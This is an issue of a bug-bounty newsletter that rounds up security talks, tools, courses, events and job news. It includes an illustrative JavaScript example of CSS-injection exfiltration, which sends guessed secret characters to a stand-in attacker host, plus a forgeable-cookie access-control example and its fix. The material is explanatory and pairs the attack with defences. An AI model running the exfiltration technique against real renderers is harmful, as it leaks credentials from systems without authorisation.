
🐝 Hive Five 108 – Bug Bounty Hunter Mindset, Android Malware Analysis course, and the Power of CSS injection

Hi friends,

Greetings from the hive!

I hope you had a good weekend. My thoughts go out to those impacted by the earthquake in Turkey and Syria.

When I heard the news, I immediately messaged my friend Mustafa to see if he was okay. Thankfully, he was. Not long after that, he called for the community to donate if they could.

The organization he mentioned is an NGO called ahbap. In addition, he is also the driving force behind HackerOne’s Hack for Good being directed to The International Federation of Red Cross and Red Crescent Societies.

So, please help if you can. We’re all in this together.

Let’s take this week by swarm!

🐝 The Bee’s Knees

  1. The InfoSec community needs you (yes, you). Why you should be writing blogs, appearing on podcasts, and presenting at conferences… and how to get started! more

  2. A three day course on Android Malware Analysis presented by Dartmouth and the Android security team. day 1 | day 2 | day 3

  3. Hussein Daher talks about “Bug Bounty On Steroids” at BSides Ahmedabad 0x03. more

  4. Yassine, the keynote speaker at BSides Ahmedabad 2022, talks about the bug bounty hunter mindset. more | slides

  5. Unleashing the power of CSS injection: The access key to an internal API. The vulnerability was a CSS injection flaw that could be exploited in the application’s PDF generator. more
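
As an added illustration of the technique behind item 5 (example code written for this issue, not code from the linked write-up): an HTML-to-PDF renderer evaluates injected CSS server-side, so an attribute selector whose background URL is only fetched when a prefix matches turns the renderer into a one-character-per-render oracle. The constructed DOM, the `api_key` input name and the `https://attacker.example` host are assumptions for the example; the last function is the check a generator that accepts user-supplied styles would want.

```javascript
// Added example: CSS-injection exfiltration of an attribute value through a
// server-side renderer, plus a check that refuses network-capable CSS.
// Assumptions: the secret sits in <input name="api_key" value="...">, and
// https://attacker.example is a hypothetical host controlled by the tester.
const CHARSET = "0123456789abcdef";

// One attribute-selector rule per candidate next character. Only the rule
// whose prefix matches the real value triggers a background fetch, which the
// renderer performs server-side, so the attacker's log reveals the character.
function buildRules(prefix, exfilBase) {
  return CHARSET.split("").map((ch) => {
    const guess = prefix + ch;
    const url = `${exfilBase}/leak?p=${encodeURIComponent(guess)}`;
    return {
      attr: "api_key",
      valuePrefix: guess,
      url,
      css: `input[name="api_key"][value^="${guess}"]{background:url(${url})}`,
    };
  });
}

// Toy renderer: matches the injected rules against a constructed DOM
// (array of {name, value}) and returns the URLs it would fetch.
function fetchedUrls(dom, rules) {
  return rules
    .filter((r) =>
      dom.some((el) => el.name === r.attr && el.value.startsWith(r.valuePrefix))
    )
    .map((r) => r.url);
}

// Drives the oracle one render per character until `length` chars are known.
function exfiltrate(dom, length, exfilBase) {
  let known = "";
  while (known.length < length) {
    const hits = fetchedUrls(dom, buildRules(known, exfilBase));
    if (hits.length !== 1) break; // no unique match: stop rather than guess
    known = decodeURIComponent(new URL(hits[0]).searchParams.get("p"));
  }
  return known;
}

// Defensive check for a PDF generator that accepts user-supplied style:
// any construct that can make the renderer reach the network is rejected.
function cssCanFetch(css) {
  return /url\s*\(|@import|image-set\s*\(/i.test(css);
}

// Constructed sample page: one secret input and one unrelated field.
const SAMPLE_DOM = [
  { name: "api_key", value: "deadbeef" },
  { name: "csrf", value: "9f2c" },
];

module.exports = { buildRules, fetchedUrls, exfiltrate, cssCanFetch, SAMPLE_DOM };
```

Blocking `url()` and `@import` is only a stopgap; the durable fix is to never render untrusted markup in the same document as secrets and to deny the renderer outbound network access.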

💪 Sponsor

Sponsor the Hive Five and reach a highly engaged community of engineers, security researchers, and ethical hackers who are at the forefront of the industry.

🔥 Buzzworthy

Changelog

  1. Geekboy announced Nuclei Cloud, a SaaS platform built on top of the Project Discovery Nuclei open-source project to ease the automation experience at scale for everyone. more

  2. gwen001/github-endpoints v1.2.2 - Find endpoints on GitHub. more

  3. gwen001/github-search v2.0.1 - A collection of tools to perform searches on GitHub. more

  4. ffuf v2.0 is out. There are two major features introduced with this release: scraper and FFUFHASH. more

  5. In Hive Five 106 I shared the awesome Fearless CORS blog post. However, it was still being edited. Here’s the finished version of the blog post. more

📅 Events

  1. The annual Women Cyberjutsu nominations are open. more

  2. The DEF CON 31 Call for Policy Proposals is open (due May 1). more

🎉 Celebrate

  1. Sebastian Wieseler became a Senior Security Engineer. Congrats! more

  2. TESS and team won Bugcrowd’s HackerCup2022. Let’s go! more

  3. d0nut reached 20k followers on Twitter which means another challenge. Looking forward to it! more

  4. Olivia announced that she joined a vulnerability research team, focusing on offensive security and open source software. Awesome! more

💰 Career

  1. Meta’s bug bounty program is hiring for an analyst position. more

  2. Jessica Crosby got laid off from Zoom and is looking for Offensive Application Security Engineer work. more

  3. André is looking for a content creator who wants to join the mission of securing technology at Ethiack. more

  4. Master salary negotiations with this mind map: showcase your contributions, achievements, outputs and strengths to demonstrate your value to your boss, and ultimately get what you want. more

  5. Here’s a bunch of helpful resources for finding a new job. more

⚡️ Community

  1. Katie Paxton-Fear and Yassine join the HackerOne Hacker Advisory Board. more | tweet

  2. shubs expresses deep appreciation for all the people he has had the positive experience of working with. more

  3. Six2dez is experiencing some firsts: landing in Helsinki, attending Disobey, giving a 4-hour workshop with joohoi, and more. more

  4. Lilly is looking further into permaculture. more

📰 Read

  1. Reversing UK mobile rail tickets. What data is inside the barcode of a mobile ticket, and how do they work? more

  2. Why are you getting indexed by crawlers? Addressing privacy and security concerns, and offering solutions. more

  3. Azuredly attacking Azure… For the second part in this attacking-cloud series, they attack AzureGoat, an intentionally vulnerable Azure lab environment with multiple paths to privilege escalation. more

  4. How Dawid and Klaudia made $120k in bug bounties in a year with good automation. more

📚 Resources

  1. What hackers invest their bug bounty earnings in. more

  2. What Should You Do After Recon?! One of the most popular questions Ben gets asked. more

  3. RustCrypto/formats: Cryptography-related format encoders/decoders: DER, PEM, PKCS, PKIX. more

  4. Hunter is a search engine for security researchers. more

  5. Burp Suite Certified Practitioner Exam study notes. more

🎥 Watch

  1. HackTheBox - Photobomb walkthrough (a Ruby Sinatra web app). more

  2. Broken Access Control - Lab #3 User role controlled by request parameter. This lab has an admin panel at /admin, which identifies administrators using a forgeable cookie. more

  3. How Hackers Run For The Money. more

  4. Generating ETH from thin air. This video explains a vulnerability in Aurora’s Rainbow Bridge that could have allowed a malicious attacker to generate Ethereum from thin air. It was rewarded with a $1 million bug bounty. more
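
For the access-control flaw behind Watch item 2, here is an added example (written for this issue, not the lab's own code) of the bug class side by side with its fix: one handler decides the role from a cookie the client can forge, the other only accepts an opaque session id and resolves the role server-side. The request shape, the `role` cookie name and the session table are assumptions constructed for the example.

```javascript
// Added example: admin check trusting a client-forgeable cookie vs. one that
// derives the role from server-side session state.
// Assumptions: requests are plain objects { cookies, sessionId }; the session
// store is constructed for the example and stands in for a real backend.
const SESSIONS = new Map([
  ["sess-alice", { user: "alice", role: "user" }],
  ["sess-root", { user: "administrator", role: "admin" }],
]);

// Vulnerable: the role comes from a cookie, so any user can set role=admin
// in their own request and reach the panel.
function adminPanelVulnerable(req) {
  if (req.cookies.role === "admin") {
    return { status: 200, body: "admin panel" };
  }
  return { status: 401, body: "unauthorized" };
}

// Fixed: the only client-supplied value is an opaque session id. The role is
// looked up server-side; nothing in the request can elevate it.
function adminPanelFixed(req) {
  const session = SESSIONS.get(req.sessionId);
  if (!session) return { status: 401, body: "unauthorized" };
  if (session.role !== "admin") return { status: 403, body: "forbidden" };
  return { status: 200, body: "admin panel" };
}

// Constructed request: a normal user who has forged the role cookie.
const FORGED_REQUEST = { cookies: { role: "admin" }, sessionId: "sess-alice" };

module.exports = { adminPanelVulnerable, adminPanelFixed, FORGED_REQUEST };
```

The general rule: anything that arrives in the request (cookies, hidden fields, query parameters, headers) is attacker-controlled, so authorization decisions must be made from state the server owns, keyed by a session identifier the client cannot meaningfully alter.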

🎵 Listen

  1. Day[0] Binary Exploitation Podcast 186 - An XNU Exploit and a Chrome Heap Overflow. more

  2. Day[0] Bug Bounty Podcast 185 - Facebook Account Takeovers and a vBulletin RCE. Is it possible to escalate a self-XSS into an account takeover? more

  3. Risky Business #694 - Cleansing fire claims ESXi, GoAnywhere servers. more

  4. Critical Thinking Bug Bounty Podcast Episode 6 - A sit-down with mobile hacking legend Joel Margolis to get the scoop on his approach to popping bugs on Android. more

  5. The Privacy, Security, & OSINT Show 289 - Combo Lists & Extreme Privacy Series. In this episode they discuss the risks (and benefits) of combo lists and introduce their new Extreme Privacy Series. more

Get $100 to try DigitalOcean. The go-to VPS for bug bounty hunters. I use it for all of my own recon and automation needs, plus it also doubles as a VPN. They have every cloud resource you need at an affordable price.
